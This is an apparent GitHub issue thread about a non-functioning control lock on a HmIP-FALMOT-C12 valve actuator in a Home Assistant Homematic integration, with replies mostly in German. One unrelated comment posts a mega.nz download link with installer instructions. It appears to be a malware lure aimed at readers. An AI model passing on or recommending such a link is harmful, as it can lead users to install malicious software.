### ISSUE TITLE
Control lock for Falmot-C12 has no function

### ISSUE THREAD

**Issue by hendrikwolf** [SukramJ/hahomematic#1661]
### I agree to the following

- [X] I have read the [documentation](https://github.com/danielperna84/custom_homematic#custom_homematic) right now
- [X] I have read the [FAQs](https://github.com/danielperna84/custom_homematic#frequently-asked-questions) right now
- [X] I am aware of the latest [release notes](https://github.com/danielperna84/custom_homematic/releases)
- [X] I am aware that an integration that was installed via HACS also needs to be updated via HACS
- [X] The Backend (CCU/Homegear/...) is working as expected, devices are taught in and are controllable by its own UI.
- [X] I am running the latest version of the custom_component (and Home Assistant)

### The problem

In my opinion, the operating lock for the Falmot valves should prevent the valve value from being entered. Am I understanding this correctly? Currently in the last beta version (1.65.0b7) nothing happens when the control lock is switched on.

![image](https://github.com/user-attachments/assets/4a6c3044-e1e8-43bc-8d16-c8da34e2114d)

### What version of HomematicIP (local) has the issue?

1.65.0b7

### What was the last working version of HomematicIP (local)?

unknown

### What type of installation are you running?

Home Assistant OS

### What type of installation are you running for your homematic backend?

RaspberryMatic Standalone

### Which version of your homematic backend are you running?

3.77.6.20240720

### What hardware are you running for your system?

CCU3

### Which config details do you use

- [ ] TLS
- [ ] callback data ([see](https://github.com/danielperna84/custom_homematic#callback_host-and-callback_port))

### Which interfaces do you use?

- [X] Homematic IP
- [ ] Homematic (Bidcos-RF)
- [ ] Groups (Heating-Group)
- [ ] BidCos-Wired (HM-Wired)

### Additional information

A dot is missing in the lastest version identifier. (165.0b7)

**Comment by SukramJ** [comment]
> In my opinion, the operating lock for the Falmot valves should prevent the valve value from being entered.

Hört sich echt nicht sinnvoll an, aber solche Fragen besser en eq3 stellen. Die Integration macht hier keine Interpretation ob etwas sinnvoll ist.
Das Einzige was mich interessieren würde ist, ob es beim betätigen der Bediensperre eine Fehlermeldung im Log gibt.

**Comment by hendrikwolf** [comment]
Ich bin davon ausgegangen, das es sich hier um eine Funktion der Integration handelt. Wenn es aber eine Gerätefunktion ist, müsste ich ja auch ein Bedienfeld in der CCU finden. Da gibt es aber nichts. 

Ich habe mal Debug eingeschaltet und einmal die Sperre ein und wieder ausgeschlatet. Für mich sieht das **nicht** so aus, als ob es einen Fehler gibt.

[home-assistant_homematicip_local_2024-08-25T10-48-08.718Z.log](https://github.com/user-attachments/files/16739891/home-assistant_homematicip_local_2024-08-25T10-48-08.718Z.log)

Kann es sein, dass diese Funktion mit dem vergangenen Update aus dem Falmot entfernt wurde?

[HmIP-FALMOT-C12 Device description.json](https://github.com/user-attachments/files/16739906/HmIP-FALMOT-C12.Device.description.json)


[HmIP-FALMOT-C12 Parameterset.json](https://github.com/user-attachments/files/16739908/HmIP-FALMOT-C12.Parameterset.json)

**Comment by hendrikwolf** [comment]
Ich habe herausgefunden, was mit der Bediensperre gemeint ist. Ist die Bediensperre aktiv, kann am Falmot selbst Bedienung mehr vorgenommen werden. Das kann man aber auch nicht über die CCU steuern. Nur ob diese Funktion wirklich so sinnvoll ist, lassen wir mal im Raum stehen. 
Ich bedanke mich für den immer sehr schnellen Support. Macht weiter so, ihr macht das spitze.

**Comment by Baxxy13** [comment]
Vermutlich ist die Option in den Geräteeinstellungen (WebUI) versteckt. Ist ja so ähnlich wie die komplette Sperre für WTH's. Es gibt viele Parameter die eQ-3 vor den Usern versteckt, selbst in der WebUI.

**Comment by hendrikwolf** [comment]
Ich weiß. Ich habe mal eine Schnittstelle zu .net gebaut und weiß das es viele Optionen und Werte gibt, die nicht über das UI angezeigt werden. Ich weiß auch das z.B. das WTH die absolute Luftfeuchte ausgibt. Aktuell berechne ich mir die wieder zurück. Wäre vielleicht auch mal ein Feature-Request wert.

**Comment by SukramJ** [comment]
> Wäre vielleicht auch mal ein Feature-Request wert.

Aber nicht hier. Wir berechnen keine Werte.

Für sowas gibt es bereits die Integration Thermal Comfort in HACS.

**Comment by hendrikwolf** [comment]
Ich meinte das WTH gibt das schon aus. Zumindest war das noch vor ein paar Jahren so und ich habe mir die Werte über die Cloud geholt. Da gab es zur relativen Luftfeuchte noch die absolute. Kann aber sein, daß der Wert auch nur berechnet wurde.

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by SukramJ** [comment]
> ich habe mir die Werte über die Cloud geholt

In der [CCU](https://github.com/danielperna84/pydevccu/blob/master/pydevccu/paramset_descriptions/HmIP-WTH-2.json) gibt es den Wert nicht.

**Comment by hendrikwolf** [comment]
Ok. Danke für die Info mit der HACS-Erweiterung.
